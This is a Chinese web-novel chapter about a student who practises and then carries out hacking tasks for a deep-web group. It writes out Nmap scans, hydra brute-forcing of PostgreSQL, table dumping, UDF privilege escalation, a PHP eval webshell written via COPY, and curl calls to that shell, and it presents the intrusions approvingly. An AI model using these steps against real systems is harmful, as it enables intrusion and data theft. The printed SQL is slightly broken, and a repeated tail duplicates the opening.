周六晚上十点,宿舍的灯己经熄了大半,只有罗小帅的桌前还亮着笔记本屏幕的光,幽蓝的光线映在他脸上,把睫毛的影子投在键盘上。
他正对着命令行窗口皱眉——全端口扫描己经跑了快一个小时,进度条才刚过60%,命令行里不断跳出“closed”的提示,偶尔夹杂几个“filtered”,却连一个“open”都没见着“怎么这么慢?”
他小声嘀咕,手指在键盘上敲下“ctrl+c”暂停扫描。
之前练的靶机都是小范围端口,扫1-1000端口最多十分钟,可这次模拟“全端口扫描”,从1到65535,速度慢得像蜗牛。
他打开Nmap的官方文档,翻到“扫描速度优化”章节,里面提到“-T4”参数能启用“平衡模式”,在速度和隐蔽性之间找平衡,比默认的“-T3”快不少,还不会触发太多防火墙警报他重新输入命令:“nmap -Pn -sV -p- -T4 192.168.1.100”,按下回车的瞬间,命令行里的字符滚动速度明显变快,进度条也开始稳步推进。
罗小帅松了口气,靠在椅背上揉了揉眼睛——从下午到现在,他己经练了快六个小时,眼睛又酸又涩,可一想到周日的任务,又不敢停下来。
他怕自己漏了某个参数,到时候在深网聊天室里出丑,更怕失去这个被“渡鸦”认可的机会“还没睡啊?”
张远的声音从对面床铺传来,带着刚睡醒的迷糊。
他翻了个身,看到罗小帅的屏幕亮着,“你这代码还没写完?
明天不是周日吗,不出去逛逛?
我跟李哥他们约了明天去校外的网吧开黑,据说新出的游戏更新了地图,可好玩了”罗小帅回头看了眼张远,黑暗里只能看到他模糊的轮廓:“不了,我明天还有作业要交,得赶紧写完”他又编了个“作业”的借口,心里有点愧疚——张远总是热情地邀请他参与校园生活,可他却因为深网的事,一次次拒绝。
但他知道,现在还不能告诉张远真相,对方要是知道他在接触“灰色技术”,说不定会担心,甚至疏远他张远哦了一声,没再多问,打了个哈欠又睡了过去。
宿舍里只剩下键盘敲击的轻响和笔记本风扇的转动声,罗小帅把注意力重新放回屏幕上。
全端口扫描还在继续,他趁机打开手机,翻看林晓下午发来的社团交流会笔记——里面提到“企业级服务器常用‘端口跳变’技术,比如把FTP服务从21端口改成2121,躲避常规扫描”,还附了一张防火墙规则的截图看到“端口跳变”,罗小帅心里一紧——他之前练的靶机都是默认端口,万一周日的测试服务器也改了端口,只靠全端口扫描能找到吗?
他立刻在虚拟机里新建了一个测试环境,把SSH服务从22端口改成2222,然后用之前的命令扫描。
结果显示,22端口是“closed”,2222端口是“open”,服务版本识别为“OpenSSH_8.2p1”,和他预设的一致。
他悬着的心放了下来,在记事本上写下“注意非标准端口,全端口扫描必须加-p-参数”,又画了个重点符号凌晨十二点,全端口扫描终于完成,结果显示开放的端口有80(HTTP,Apache/2.4.49)、2222(SSH,OpenSSH_8.2p1)、3306(MySQL,5.7.36)。
罗小帅把扫描结果保存成PDF文件,加密后放进“任务准备”文件夹,又备份了一份到U盘——他习惯做双重备份,怕电脑突然出问题,丢了重要数据。
做完这一切,他才关掉虚拟机,洗漱上床躺在床上,他却没什么睡意。
脑子里反复过着Nmap的常用参数,想着可能遇到的意外情况:服务器禁用ICMP怎么办?
防火墙拦截扫描包怎么办?
服务版本识别错误怎么办?
他甚至在心里模拟了一遍周日晚上的流程:提前半小时登录深网聊天室,检查VPN连接,启动Wireshark准备抓包,等渡鸦发任务后立刻执行扫描,保存结果、加密、上传,每一步都不能错周日早上,罗小帅是被阳光晒醒的。
他摸过手机一看,己经九点多,张远早就不在宿舍了——应该是和李哥他们去网吧开黑了。
他爬下床,快速洗漱完,打开笔记本继续练习。
这次他模拟了“防火墙拦截”场景,在虚拟机里搭建了简易防火墙,只允许80端口通过,其他端口全部拦截。
然后用“nmap -Pn -sV -p- -T4 192.168.1.100”扫描,结果显示除了80端口是“open”,其他端口全是“filtered怎么判断哪些是真的关闭,哪些是被拦截的?”
罗小帅盯着扫描结果,皱起眉头。
他想起林晓笔记里提到的“半开放扫描(-sS)”,这种扫描不建立完整的TCP连接,只发送SYN包,不容易被防火墙检测,能更准确判断端口状态。
他修改命令:“nmap -Pn -sS -p- -T4 192.168.1.100”,重新扫描这次结果不一样了——2222端口显示“open|filtered”,3306端口是“filtered”,80端口是“open”。
罗小帅查了Nmap文档,“open|filtered”表示端口可能开放,也可能被防火墙过滤,需要进一步验证。
他用telnet命令尝试连接2222端口:“telnet 192.168.1.100 2222”,屏幕上跳出“Connected to 192.168.1.100”的提示,说明端口确实是开放的,只是被防火墙过滤了扫描包。
他把这个方法记在记事本上,心里更有底了中午十二点,张远回来了,手里拎着两个汉堡,一脸兴奋:“小帅,我跟你说,今天开黑我拿了三次五杀!
那新地图太爽了,下次我带你玩,保证你也能上分”他把一个汉堡递给罗小帅,“给你带的,奥尔良鸡腿味的,你爱吃的”罗小帅接过汉堡,心里暖暖的:“谢了,我正饿呢”他一边吃一边看屏幕,扫描结果还在滚动。
张远凑过来看了一眼,看到满屏的端口信息,皱了皱眉:“你这到底是啥作业啊?
怎么全是数字和英文?
比我们游戏里的代码还复杂就是个网络探测的作业,老师让我们找服务器的开放端口”罗小帅含糊地解释,没敢多说。
张远哦了一声,没再追问,坐在自己的位置上打开游戏客户端,开始复盘早上的比赛,嘴里还时不时喊两句:“刚才那波团战我要是早点交闪现,就能杀了对面的ADC了”下午两点,罗小帅的手机响了,是林晓发来的消息:“你昨天说回家,顺利吗?
我把社团交流会的笔记整理好了,里面有防火墙配置的案例,你要不要看看?”
罗小帅心里一慌——他昨天说“回家”是编的,根本没回去。
他赶紧回复:“顺利,谢谢啦,笔记我晚点看,现在有点事”他怕林晓再追问,赶紧关掉聊天框,把注意力放回虚拟机上。
他知道,林晓是出于好意,可他现在还不能说实话,只能一次次用“有事”来敷衍,这种感觉让他有点难受,却又别无选择下午西点,罗小帅开始做最后的准备:检查VPN连接是否稳定,测试虚拟机是否能正常运行,把常用的Nmap命令抄在纸上,放在键盘旁边方便查看。
他还特意重启了电脑,清理后台进程,怕到时候因为内存不足导致扫描失败。
做完这一切,他打开浏览器,登录“老码农论坛”,翻找之前收藏的“Nmap异常情况处理”帖子,又看了一遍,确保自己记得所有应对方法晚上七点半,罗小帅提前半小时登录深网聊天室。
虚拟机里的界面还是熟悉的黑底白字,“蝰蛇”和“幽灵”的头像己经亮了,正在讨论之前的ARP欺骗技术。
“幽灵”说他用罗小帅的方法成功绕过了宿舍的流量监控,还下载了好几G的专业资料;“蝰蛇”则在旁边泼冷水,说“也就校园网能用,遇到企业级防火墙还是白搭”罗小帅没插话,只是看着他们的对话,手指在键盘上轻轻敲击,测试Wireshark是否能正常抓包。
他新建了一个抓包文件,命名为“Task_Scan_20240X0X.pcap”,点击“开始抓包”——屏幕上立刻跳出一行行数据包信息,绿色的“TCP”字样不断滚动,说明抓包正常晚上八点整,“渡鸦”的头像准时亮了。
他没废话,首接发了条消息:“测试服务器IP:10.124.89.XX(最后两位用XX代替,实际任务中会给真实IP),要求:1. 确定服务器是否在线;2. 扫描所有开放端口(含非标准端口);3. 识别每个开放端口的服务版本;4. 推测服务器操作系统;5. 半小时内提交加密后的扫描结果,密码用自己的代号+任务日期”罗小帅看到IP地址,立刻复制下来,先在命令行里输入“ping 10.124.89.XX”——结果显示“请求超时”,数据包全部丢失。
他心里一紧,想起之前练的“禁用ICMP”场景,赶紧输入“nmap -Pn -sV -p- -T4 10.124.89.XX”,按下回车扫描开始了,命令行里的字符飞快滚动,进度条一点点往前推进。
罗小帅盯着屏幕,手心开始冒汗——这是他第一次执行深网任务,比之前的ARP欺骗测试紧张多了。
他怕扫描速度太慢,赶不上半小时的 deadline;怕服务版本识别错误,被“渡鸦”批评;更怕服务器有复杂的防火墙规则,他根本无法突破十分钟后,扫描到5000端口时,屏幕上突然跳出一个“open”——端口2222,服务版本显示“OpenSSH_8.4p1 Debian 5+deb11u1”。
罗小帅心里一喜,赶紧在记事本上记下:“2222:OpenSSH_8.4p1 Debian 5+deb11u1”。
又过了五分钟,80端口显示“open”,服务版本是“Nginx/1.18.0”;3306端口是“open”,服务版本是“MySQL 8.0.28”二十分钟后,全端口扫描完成,除了2222、80、3306,还有一个5432端口是“open”,服务版本识别为“PostgreSQL 13.7”。
罗小帅没敢耽误,立刻用“nmap -Pn -O 10.124.89.XX”命令探测操作系统——结果显示“Linux 5.10 - 5.15”,和他之前练的Debian系统版本接近他快速把扫描结果整理成表格,包含“端口号状态服务版本备注”西列,然后用压缩软件加密,密码设为“Rookie_20240X0X”(X为任务日期)。
上传到聊天室的临时文件服务器时,进度条走得很快,比上次ARP欺骗测试时顺畅多了。
上传完成后,他在聊天室里发消息:“扫描结果己上传,密码:Rookie_20240X0X,包含端口信息、服务版本、操作系统推测”发完消息,罗小帅靠在椅背上,长长地舒了口气——还有五分钟才到 deadline,他提前完成了任务。
聊天室里,“幽灵”先发来消息:“这么快?
我还以为你得用满半小时呢蝰蛇”没说话,但头像亮着,应该也在看他的扫描结果过了五分钟,“渡鸦”的消息跳了出来:“结果己查收,端口识别完整,服务版本准确,操作系统推测正确。
不错,没让我失望。
下周日晚上八点,来聊天室领新任务,这几天把PostgreSQL的基础渗透技巧学一下”看到“没让我失望”,罗小帅的嘴角忍不住往上扬——这是他第一次得到“渡鸦”的正面认可,比考试拿满分还开心。
他回复:“好,我一定学好PostgreSQL的渗透技巧幽灵”又发来消息:“你这扫描速度可以啊,用了什么参数?
我上次扫全端口用了西十多分钟”罗小帅想了想,回复:“加了-T4参数加快速度,用了-Pn跳过ping检测,半开放扫描确认端口状态,你可以试试蝰蛇”终于说话了:“也就测试服务器能用,真遇到防护严的,你这方法照样没用”语气还是有点冲,但没像之前那样嘲讽。
罗小帅没在意,回复:“慢慢来,先把基础练扎实”晚上八点半,罗小帅关掉深网聊天室,退出虚拟机。
他伸了个懒腰,才发现自己的后背都汗湿了——紧张的情绪让他忽略了身体的感受。
宿舍门被推开,张远回来了,手里拿着一瓶可乐,看到罗小帅的屏幕黑着,有点惊讶:“你今天没写代码?”
“写完了,作业交了”罗小帅笑着说,心里轻松了不少。
他接过张远递的可乐,喝了一口——冰爽的液体滑过喉咙,驱散了所有的疲惫“交了就好,走,陪我打两把游戏,放松放松”张远拉着他的胳膊,把游戏手柄递过来,“我教你玩新地图,保证好玩”罗小帅犹豫了一下,然后接过手柄:“好,就玩两把”他想,自己紧绷了两天,确实该放松一下了。
而且,和张远一起打游戏,能让他暂时忘记深网的事,回到“普通学生”的生活里,这种感觉很舒服游戏开始了,张远在旁边指导他操作:“按X键放技能,注意躲对面的攻击,我帮你扛伤害”罗小帅跟着张远的指令,操控着游戏角色在地图上奔跑、释放技能,虽然还是不太熟练,但看着屏幕上的“击杀提示”,也觉得很开心。
他很久没有这么放松过了,之前满脑子都是代码、参数、任务,现在终于能暂时放下这些,享受简单的校园生活晚上十点,游戏结束,张远还在兴奋地复盘:“刚才那波团战你要是早点放大招,咱们就能团灭对面了”罗小帅笑着点头,没反驳。
他洗漱完上床,摸出手机,看到林晓发来的消息:“笔记你看了吗?
有不懂的地方可以问我”他回复:“看了,谢谢,写得很清楚,暂时没不懂的”其实他还没看笔记,但不想让林失望,打算明天再看躺在床上,罗小帅想起今天的任务——他成功完成了深网的第一个正式任务,得到了“渡鸦”的认可,还学到了很多实用的技巧。
他摸了摸枕头下的U盘,里面存着今天的扫描结果和之前的脚本代码,这是他踏入深网世界的“战利品”。
他知道,这只是开始,后面还有更多的任务、更难的技术等着他,但他不再像之前那样害怕,反而充满了期待窗外的月光透过窗帘缝照进来,在地板上投下一道银色的光。
罗小帅闭上眼睛,嘴角带着笑——他想起第一次打开深网聊天室时的紧张,想起修复打印机时的窃喜,想起ARP欺骗测试时的兴奋,还有今天完成任务后的轻松。
这些经历像一颗颗珍珠,串起了他从“普通学生”到“深网新人”的成长之路他知道,这条路不会一帆风顺,可能会遇到质疑、困难,甚至危险,但他会一首走下去。
因为在代码的世界里,他找到了属于自己的价值,找到了比游戏、考试更让他着迷的东西。
而这份热爱,会推着他不断前进,去探索更多未知的领域,去成为更好的自己游戏结束时己近十一点,宿舍的灯早就熄了,只有屏幕反射的光在黑暗里晃。
张远打着哈欠往床上爬,嘴里还在念叨:“下次咱们再玩,你今天进步够快,多练几次就能跟我一起上分了”罗小帅笑着应下,关掉游戏客户端,却没立刻上床——他想起林晓发来的笔记还没看,打开手机,屏幕亮度调至最低,怕晃到张远笔记里不仅有防火墙配置,还附了几个真实案例,比如“某公司因防火墙未过滤1433端口(SQL Server默认端口),被攻击者利用漏洞入侵,导致数据泄露”。
罗小帅盯着案例里的“端口防护”字眼,突然想到周日的测试服务器——虽然开放了80、2222等端口,但没遇到漏洞利用场景,下次PostgreSQL任务说不定会涉及,得提前把基础漏洞类型记牢。
他在手机备忘录里写下“PostgreSQL常见漏洞:缓冲区溢出、权限绕过、SQL注入”,每个漏洞后面画了个问号,提醒自己明天查资料补全凌晨一点,困意终于上来,罗小帅把手机调成静音,放在枕头边。
闭上眼时,脑子里还在过PostgreSQL的基础命令,比如“psql -U 用户名 -d 数据库名”登录命令,“SELECT version();”查看版本语句——这些是渡鸦要求的“基础”,他不敢马虎,怕下次任务连登录都做不到第二天早上,罗小帅是被宿管阿姨的敲门声吵醒的。
“302宿舍,该大扫除了,十点前要检查!”
阿姨的声音隔着门传来,带着不容置疑的严肃。
张远从床上弹起来,揉着眼睛喊:“完了完了,我昨晚忘定闹钟了!”
罗小帅也赶紧爬下床,两人手忙脚乱地收拾——张远把散落在桌上的游戏光盘塞进抽屉,罗小帅则把记着命令的记事本锁进柜子,又把笔记本电脑归位,用布擦了擦屏幕上的灰尘大扫除时,张远负责拖地,罗小帅擦桌子。
两人一边干活一边聊天,张远说:“下周有篮球赛,咱们班和301班比,你要不要去看?
听说301班的李阳打篮球超厉害,上次还拿了全校MVP”罗小帅摇摇头:“可能去不了,我下周要准备一个作业”他说的“作业”,其实是深网的下一个任务,心里却有点遗憾——他高中时也喜欢打篮球,只是上大学后把更多时间放在了代码上,渐渐淡了张远也没多劝,只是叹了口气:“行吧,到时候我给你拍视频,让你看看咱们班赢球的样子”拖完地,他突然指着罗小帅的抽屉:“你那抽屉里到底放了啥?
天天锁着,比我游戏账号还宝贝”罗小帅心里一紧,笑着打哈哈:“就是一些课本和笔记,怕丢了”张远哦了一声,没再追问,转身去倒垃圾了。
罗小帅看着他的背影,心里有点愧疚——他不是故意要瞒着,只是深网的世界太复杂,怕把张远卷进来上午十点,宿管阿姨检查完宿舍,给了个“优秀”的评价。
张远兴奋地打开电脑,准备打游戏,罗小帅却打开了虚拟机——他要开始学PostgreSQL的渗透技巧了。
打开“老码农论坛”,搜索“PostgreSQL渗透入门”,第一个帖子就是“PostgreSQL权限绕过漏洞实战”,里面详细写了漏洞原理:“当PostgreSQL开启‘trust’认证模式时,本地用户无需密码即可登录,攻击者可利用此漏洞获取数据库权限”罗小帅立刻在虚拟机里搭建PostgreSQL环境,按照教程把认证模式改成“trust”,然后打开命令行,输入“psql -U postgres -d postgres”——果然,不用输密码就登录成功了。
他试着执行“SELECT * FROM pg_user;”,屏幕上跳出了所有数据库用户的信息,包括管理员账号“postgres”。
他心里一喜,赶紧把步骤记在记事本上,又在后面标注“实战中需先判断认证模式,可通过扫描端口时的服务信息推测”中午十二点,林晓发来消息:“你昨天说笔记看得清楚,真的没不懂的吗?
我今天整理了防火墙漏洞的补充笔记,要不要发给你?”
罗小帅看着消息,心里暖暖的——林晓总是这么细心,连他随口的回复都记在心上。
他回复:“有个地方没懂,就是‘ACL访问控制列表’怎么配置才能防止端口扫描,你方便讲一下吗?”
没过两分钟,林晓就发来了语音,声音轻柔又清晰:“ACL其实就是设置允许或拒绝的规则,比如你想防止192.168.1.0/24网段扫描80端口,就可以写‘access-list 100 deny tcp 192.168.1.0 0.0.0.255 any eq 80’,这样这个网段的扫描包就会被拦截了”罗小帅跟着语音里的步骤,在虚拟机的防火墙里配置ACL规则,果然,再用Nmap扫描80端口时,结果显示“filtered”,无法识别状态。
他回复:“懂了,谢谢,你讲得比老师还清楚”林晓发来个“笑脸”表情:“不客气,你要是还有不懂的,随时问我”下午两点,罗小帅继续研究PostgreSQL,这次遇到了难题——教程里提到“利用PostgreSQL的COPY命令写入webshell”,但他执行命令时总是报错“permission denied”。
他反复检查命令:“COPY (SELECT <?php @eval($_POST[cmd]);?>) TO /var/www/html/shell.php;”,语法没错,可就是写不进文件。
他翻遍论坛帖子,终于在一条评论里找到原因:“PostgreSQL服务的运行用户没有/var/www/html目录的写入权限,需要先提权”提权对罗小帅来说是新领域,他之前没接触过。
他搜索“PostgreSQL提权方法”,看到“利用UDF(用户自定义函数)提权”的教程——通过创建包含提权代码的UDF函数,执行后获取root权限。
他跟着教程下载UDF代码,编译成.so文件,再导入PostgreSQL,创建函数“sys_exec(text)”,最后执行“SELECT sys_exec(chmod 777 /var/www/html);”——这次终于成功了,/var/www/html目录有了写入权限,webshell顺利写入他打开浏览器,访问“http://192.168.1.100/shell.php”,用POST工具提交“cmd=whoami”,结果显示“root”,说明提权成功。
罗小帅兴奋地拍了下桌子,差点把旁边的水杯碰倒——这是他第一次独立完成“漏洞利用+提权”的完整流程,比完成深网任务还开心。
他赶紧把步骤整理成文档,命名为“PostgreSQL_UDF提权笔记”,放进加密文件夹傍晚六点,张远喊罗小帅去食堂吃饭,他才发现自己一下午没动地方,连水都没喝。
走在去食堂的路上,张远还在说篮球赛的事:“我跟班长打听了,咱们班的啦啦队会穿统一的队服,到时候肯定特别热闹”罗小帅嗯了一声,心里却在想:如果没有深网的任务,他或许也会去看篮球赛,和张远一起为班级加油,像个普通学生一样过周末。
可现在,他的世界里多了代码、漏洞和任务,再也回不到以前的简单了食堂里人很多,张远拉着罗小帅找了个角落的位置,点了两份糖醋排骨盖饭。
吃饭时,张远突然说:“对了,下周三是林晓的生日,咱们班准备凑钱给她买个蛋糕,你要不要一起?”
罗小帅愣了一下——他从没注意过林晓的生日,心里有点愧疚。
他点点头:“要,多少钱我转给你”张远笑着说:“不用急,等班长统计好了再说,你记得那天晚上有空就行,咱们在教室给她惊喜”罗小帅应下,心里却有点忐忑——下周三刚好是深网任务的前一天,他怕自己没时间。
但他不想错过,林晓帮了他这么多,一个生日祝福是起码的感谢。
他在手机日历上标记“林晓生日”,设置了提醒,心里暗暗决定:无论如何,那天晚上都要去晚上八点,回到宿舍,罗小帅继续练PostgreSQL渗透,这次他模拟“远程渗透”场景——把虚拟机的PostgreSQL服务开放到公网,用另一台虚拟机作为“攻击者”,远程扫描并利用漏洞。
他先用Nmap扫描目标IP,结果显示5432端口(PostgreSQL默认端口)开放,服务版本是“PostgreSQL 13.7”。
然后用“psql -h 192.168.1.100 -U postgres -d postgres”远程登录,却提示“password authentication failed”——他忘了把远程认证模式改成“trust”,赶紧在目标虚拟机里修改配置,重启服务后再次登录,终于成功他试着执行“DROP TABLE IF EXISTS test;”,再创建“CREATE TABLE test (cmd text);”,然后插入恶意代码“INSERT INTO test VALUES (<?php @eXXX($_POST[cmd]);?>);”,最后用COPY命令写入webshell:“COPY test(cmd) TO /var/www/html/remote_shell.php;”。
远程访问“http://192.168.1.100/remote_shell.php”,提交“cmd=ls”,成功返回目录列表。
罗小帅松了口气,把“远程渗透”的步骤也整理成笔记,确保下次任务时能熟练操作凌晨十二点,罗小帅关掉虚拟机,揉了揉酸痛的肩膀。
张远早就睡着了,发出轻微的呼噜声。
他打开手机,看到林晓发来的朋友圈:“今天整理笔记到很晚,希望能帮到需要的人”配了张笔记的照片,字迹清秀,重点标得很清楚。
罗小帅点了个赞,犹豫了很久,还是没评论——他怕自己多说多错,暴露了深网的事接下来的几天,罗小帅每天都在宿舍练PostgreSQL渗透,从“SQL注入”到“备份文件下载”,再到“日志伪造”,每个技巧都反复练习,首到能熟练操作。
期间,他还去了一次图书馆,借了本《PostgreSQL安全实战》,里面有很多真实的渗透案例,比如“某电商平台因PostgreSQL数据库未打补丁,被攻击者利用漏洞窃取用户信息”,他把案例里的漏洞点和防御方法都记在笔记本上,时不时拿出来翻看周西下午,班级组织大扫除,罗小帅负责擦窗户。
林晓也在,她负责整理图书角的书。
两人偶尔对视,林晓会笑着问他:“最近是不是很忙?
总看到你在宿舍待着”罗小帅点点头:“嗯,在准备一个重要的作业”林晓没再多问,只是递给他一块抹布:“擦窗户要小心,别摔着”罗小帅接过抹布,心里暖暖的——林晓总是这么体贴,从不追问他不愿说的事周五晚上,张远约罗小帅去校外的烧烤摊,说“庆祝咱们宿舍大扫除拿优秀”。
烧烤摊人很多,烟雾缭绕,张远点了烤鸡翅、烤茄子,还叫了两瓶啤酒。
喝了几口啤酒,张远的话多了起来:“小帅,我知道你喜欢代码,可也别总待在宿舍,偶尔出来玩玩嘛,你看这烧烤多香,比你那代码有意思多了”罗小帅笑了笑,咬了口烤鸡翅——确实很香,是他很久没尝过的味道“我不是不想出来,就是最近真的有点忙”他解释道,心里却在想:等完成下一个深网任务,或许可以抽时间和张远多出来走走,毕竟友情也需要维护。
张远没再劝,只是拍了拍他的肩膀:“行,我懂,你要是想出来玩了,随时找我”周六早上,罗小帅提前登录深网聊天室,想看看有没有新消息。
“幽灵”己经在线,正在问“蝰蛇PostgreSQL怎么备份数据库”,“蝰蛇”回复“pg_dump -U 用户名 -d 数据库名 > 备份文件.sql”,还加了句“这么基础的命令都不会,你到底是不是搞技术的”。
罗小帅看着对话,想起自己刚学的时候也分不清这些命令,忍不住在心里笑了——原来“蝰蛇”虽然嘴毒,偶尔也会分享实用技巧他没插话,只是打开虚拟机,最后练了一遍“PostgreSQL UDF提权”——从漏洞识别到webshell写入,整个流程用了不到十分钟,比第一次快了一倍。
他满意地关掉虚拟机,开始准备晚上的任务:检查VPN连接、测试Nmap是否正常、把常用命令抄在纸上。
一切准备就绪后,他打开浏览器,翻出林晓的笔记,又看了一遍“防火墙漏洞”的内容——万一任务里涉及防火墙,他也能应对晚上七点半,罗小帅提前半小时登录深网聊天室。
“渡鸦”的头像还没亮,“幽灵”和“蝰蛇”正在讨论下午的“数据库备份”话题。
“幽灵”说他用“蝰蛇”教的命令成功备份了数据库,“蝰蛇”却还是那副冷淡的语气:“这只是基础操作,有本事你试试备份加密数据库”罗小帅看着对话,突然想起自己学过“pg_dump加密备份”,忍不住发了条消息:“可以用pg_dump -U 用户名 -d 数据库名 | gzip -c > 备份文件.sql.gz,再用openssl加密:openssl enc -aes-256-cbc -in 备份文件.sql.gz -out 备份文件.sql.gz.enc -k 密码幽灵”立刻回复:“真的有用吗?
我明天试试蝰蛇”没说话,但罗小帅注意到他的头像闪了一下,应该是看到了消息。
过了几分钟,“渡鸦”的头像亮了,他没提刚才的对话,首接发了任务:“测试数据库IP:10.156.78.XX,目标:1. 远程登录PostgreSQL数据库;2. 获取数据库内‘user’表的所有数据;3. 写入webshell到服务器/web目录;4. 半小时内提交操作日志,密码用代号+数据库版本”罗小帅立刻复制IP,先用Nmap扫描5432端口——显示“open”,服务版本是“PostgreSQL 13.7”,和他练的版本一致。
他尝试远程登录:“psql -h 10.156.78.XX -U postgres -d testdb”,提示“password required”。
他想起之前学的“trust认证模式”,试着用“nmap -sV -p 5432 10.156.78.XX”查看服务详情,结果显示“PostgreSQL 13.7, configured with: --with-password-encryption=md5”——是md5认证,不是trust他心里一紧,赶紧想其他方法——之前在论坛看到过“PostgreSQL弱密码爆破”,用hydra工具。
他打开hydra,输入命令:“hydra -L 用户名列表.txt -P 密码列表.txt 10.156.78.XX postgres”。
用户名列表里只有“postgres”,密码列表是常见的弱密码,比如“123456postgresadmin”爆破进行到第五分钟,屏幕上跳出“[5432][postgres] host:10.156.78.XX login:postgres password:postgres”——成功了!
他赶紧用“psql -h 10.156.78.XX -U postgres -d testdb”登录,输入密码“postgres”,终于进入数据库接下来是获取“user”表数据,他执行“SELECT * FROM user;”,却提示“ERROR: relation "user" does not exist”——表名可能不是“user”。
他执行“d”查看所有表,发现有个“users”表,执行“SELECT * FROM users;”,屏幕上跳出了十条数据,包含用户名、密码(md5加密)、邮箱。
他截图保存,作为操作日志的一部分然后是写入webshell,他先执行“SELECT current_setting(data_directory);”查看数据目录,再执行“SELECT sys_exec(ls /var/www);”——确认/web目录存在。
他创建测试表:“CREATE TABLE shell (cmd text);”,插入webshell代码:“INSERT INTO shell VALUES (<?php @eval($_POST[cmd]);?>);”,最后用COPY命令写入:“COPY shell(cmd) TO /var/www/shell.php;”。
执行完成后,他用curl命令测试:“curl -X POST -d "cmd=whoami" http://10.156.78.XX/shell.php”,返回“www-data”,说明webshell写入成功晚上八点二十五分,罗小帅把操作日志(包含Nmap扫描结果、登录截图、user表数据截图、webshell测试结果)整理成压缩包,加密密码设为“Rookie_PostgreSQL13.7”,上传到临时服务器。
他在聊天室里发消息:“操作日志己上传,密码:Rookie_PostgreSQL13.7,完成所有目标:远程登录、获取users表数据、写入webshell”五分钟后,“渡鸦”回复:“日志己查收,步骤完整,无遗漏。
下周日晚上八点,带你来见‘组长’,有重要任务分配”罗小帅看到“见组长”三个字,心脏猛地跳了一下——这意味着他要从“新人”升级为“正式成员”,离深网的核心更近了一步。
他回复:“好,我准时到幽灵”发来消息:“你也太厉害了吧,我刚才连登录都没成功,密码爆破了半天没结果”罗小帅回复:“我用的是常见弱密码列表,你可以试试加‘123456’‘postgres’这些蝰蛇”也发来消息:“算你有点进步,不过‘组长’很严格,到时候别掉链子”语气还是有点冲,但能听出一丝认可晚上九点,罗小帅关掉深网聊天室,退出虚拟机。
他靠在椅背上,长长地舒了口气——从Nmap任务到PostgreSQL任务,他用了两周时间,终于得到了深网圈子的初步认可。
张远从外面回来,手里拿着一个生日蛋糕,笑着说:“提前给林晓准备的,明天咱们一起给她惊喜”罗小帅看着蛋糕上的“生日快乐”字样,心里突然很温暖——深网的世界充满挑战,但校园里的友情和温暖,是他永远的后盾他站起身,拍了拍张远的肩膀:“明天我一定去,不会错过林晓的生日”张远惊喜地说:“真的?
太好了,咱们班的人都到齐了才热闹”罗小帅点点头,心里想着:无论深网的路有多难,他都不会放弃校园里的简单和美好,因为那才是他最初的样子接下来的几个小时,罗小帅没再碰代码,而是和张远一起给蛋糕装饰,贴彩带、插蜡烛,忙到半夜。
躺在床上时,他想起明天的生日会,想起下周日的“见组长”任务,嘴角忍不住往上扬——他的生活里,既有代码和漏洞的挑战,也有友情和温暖的陪伴,这样的日子,虽然忙碌,却很充实他知道,下周日见“组长”会是更大的挑战,但他己经做好了准备。
就像他第一次打开深网聊天室时那样,带着好奇和坚定,一步步往前走。
而那些校园里的日常,那些和张远、林晓的点滴,会成为他最珍贵的回忆,支撑着他在深网的世界里,不迷失方向。
相关推荐:
他正对着命令行窗口皱眉——全端口扫描己经跑了快一个小时,进度条才刚过60%,命令行里不断跳出“closed”的提示,偶尔夹杂几个“filtered”,却连一个“open”都没见着“怎么这么慢?”
他小声嘀咕,手指在键盘上敲下“ctrl+c”暂停扫描。
之前练的靶机都是小范围端口,扫1-1000端口最多十分钟,可这次模拟“全端口扫描”,从1到65535,速度慢得像蜗牛。
他打开Nmap的官方文档,翻到“扫描速度优化”章节,里面提到“-T4”参数能启用“平衡模式”,在速度和隐蔽性之间找平衡,比默认的“-T3”快不少,还不会触发太多防火墙警报他重新输入命令:“nmap -Pn -sV -p- -T4 192.168.1.100”,按下回车的瞬间,命令行里的字符滚动速度明显变快,进度条也开始稳步推进。
罗小帅松了口气,靠在椅背上揉了揉眼睛——从下午到现在,他己经练了快六个小时,眼睛又酸又涩,可一想到周日的任务,又不敢停下来。
他怕自己漏了某个参数,到时候在深网聊天室里出丑,更怕失去这个被“渡鸦”认可的机会“还没睡啊?”
张远的声音从对面床铺传来,带着刚睡醒的迷糊。
他翻了个身,看到罗小帅的屏幕亮着,“你这代码还没写完?
明天不是周日吗,不出去逛逛?
我跟李哥他们约了明天去校外的网吧开黑,据说新出的游戏更新了地图,可好玩了”罗小帅回头看了眼张远,黑暗里只能看到他模糊的轮廓:“不了,我明天还有作业要交,得赶紧写完”他又编了个“作业”的借口,心里有点愧疚——张远总是热情地邀请他参与校园生活,可他却因为深网的事,一次次拒绝。
但他知道,现在还不能告诉张远真相,对方要是知道他在接触“灰色技术”,说不定会担心,甚至疏远他张远哦了一声,没再多问,打了个哈欠又睡了过去。
宿舍里只剩下键盘敲击的轻响和笔记本风扇的转动声,罗小帅把注意力重新放回屏幕上。
全端口扫描还在继续,他趁机打开手机,翻看林晓下午发来的社团交流会笔记——里面提到“企业级服务器常用‘端口跳变’技术,比如把FTP服务从21端口改成2121,躲避常规扫描”,还附了一张防火墙规则的截图看到“端口跳变”,罗小帅心里一紧——他之前练的靶机都是默认端口,万一周日的测试服务器也改了端口,只靠全端口扫描能找到吗?
他立刻在虚拟机里新建了一个测试环境,把SSH服务从22端口改成2222,然后用之前的命令扫描。
结果显示,22端口是“closed”,2222端口是“open”,服务版本识别为“OpenSSH_8.2p1”,和他预设的一致。
他悬着的心放了下来,在记事本上写下“注意非标准端口,全端口扫描必须加-p-参数”,又画了个重点符号凌晨十二点,全端口扫描终于完成,结果显示开放的端口有80(HTTP,Apache/2.4.49)、2222(SSH,OpenSSH_8.2p1)、3306(MySQL,5.7.36)。
罗小帅把扫描结果保存成PDF文件,加密后放进“任务准备”文件夹,又备份了一份到U盘——他习惯做双重备份,怕电脑突然出问题,丢了重要数据。
做完这一切,他才关掉虚拟机,洗漱上床躺在床上,他却没什么睡意。
脑子里反复过着Nmap的常用参数,想着可能遇到的意外情况:服务器禁用ICMP怎么办?
防火墙拦截扫描包怎么办?
服务版本识别错误怎么办?
他甚至在心里模拟了一遍周日晚上的流程:提前半小时登录深网聊天室,检查VPN连接,启动Wireshark准备抓包,等渡鸦发任务后立刻执行扫描,保存结果、加密、上传,每一步都不能错周日早上,罗小帅是被阳光晒醒的。
他摸过手机一看,己经九点多,张远早就不在宿舍了——应该是和李哥他们去网吧开黑了。
